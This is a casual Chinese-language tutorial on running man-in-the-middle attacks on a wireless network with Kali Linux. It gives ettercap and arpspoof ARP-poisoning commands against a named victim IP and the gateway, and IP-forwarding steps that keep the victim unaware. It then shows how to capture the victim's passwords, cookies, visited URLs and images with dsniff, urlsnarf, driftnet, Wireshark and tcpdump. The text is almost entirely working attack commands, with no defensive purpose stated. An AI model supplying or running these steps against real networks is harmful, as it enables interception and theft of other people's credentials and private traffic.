快過年了沒事瞎玩玩,2017有空玩玩kali。前提需要鏈接到無線網
一、Ettercap(Etter [人名] 埃特cap[kæp] 蓋;帽子)是一款嗅探工具,包含ARP欺騙,DNS,劫持,中間人攻擊,嗅探密碼等功能
(ettercap經常報錯ERROR 12 Cannot allocate memory,不知道怎麼解決哪位大神指教一下,求教)
開啓轉發,重新開啓一個命令行:
echo "1">/proc/sys/net/ipv4/ip_forward
ARP(Address Resolution Protocol)即地址解析協議是根據IP地址獲取物理地址的一個TCP/IP協議。
1、切換到Sniff標籤,點擊Unified sniffing…,選擇wlan0網絡接口,(wlan0 是無線接口eth0 是有線接口)
2、Host標籤,點擊Scan for hosts,很快,Ettercap就列出了所有該網絡下的C類地址,點擊192.168.1.102(被攻擊者IP)添加到Target 1,點擊192.168.1.1(網關地址)添加到Target 2
3、設置中間人,Mitm->arp poisoning...->Sniff remote connections打對勾 點擊確定
4、Start->Start sniffing 開始監聽
5、點view -- connections開始查看連接:
命令行方式
ettercap -T -q -i wlan0 -M arp:remote /192.168.1.102/192.168.1.1/
ettercap使用方法,參數詳解:
-P 使用插件
-T 使用基於文本界面
-q 啓動安靜模式(不回顯)
-M 啓動ARP欺騙攻擊
192.168.1.102/ 被攻擊的目標主機,第二個192.168.1.1網關ip
ettercap -i wlan0 -Tq -M arp:remote /192.168.1.100-253/ /192.168.1.1/
第一個/ / 中內容爲所欺騙的目標,第二個爲網關。 可寫// // 裏面爲空,表示全部欺騙。
二、arpspoof 進行arp欺騙
必須另外開啓終端 echo 1>/proc/sys/net/ipv4/ip_forward 進行IP流量轉發,不然被攻擊者無法上網
命令:arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102
嗅探密碼:dsniff -i wlan0
三、driftnet (drift 英 [drɪft] n.漂移,偏移;趨勢) 是一款簡單的圖片捕獲工具;urlsnarf捕獲url鏈接
再打開一個終端,輸入driftnet -i wlan0 彈出一個小方框等待獲取圖片
語法 : driftnet [options] [filter code]主要參數:
-b 捕獲到新的圖片時發出嘟嘟聲
-i interface 選擇監聽接口
-f file 讀取一個指定pcap數據包中的圖片
-p 不讓所監聽的接口使用混雜模式
-a 後臺模式:將捕獲的圖片保存到目錄中(不會顯示在屏幕上)
-m number 指定保存圖片數的數目
-d directory 指定保存圖片的路徑
-x prefix 指定保存圖片的前綴名
使用舉例:讀取一個指定pcap數據包中的圖片 driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/
再打開一個終端,輸入 urlsnarf -i wlan0 監聽瀏覽過的網頁日誌,等待獲取
五、 數據包捕獲工具
1、wireshark:命令行wireshark啓動,中間的Capture 選擇 wlan0 然後點擊 Start,獲取cookie以及沒有加密的明文密碼2、tcpdump:可以將網絡中傳送的數據包完全截獲下來提供分析。支持針對網絡層、協議、主機、網絡或端口的過濾
命令行 tcpdump -i wlan0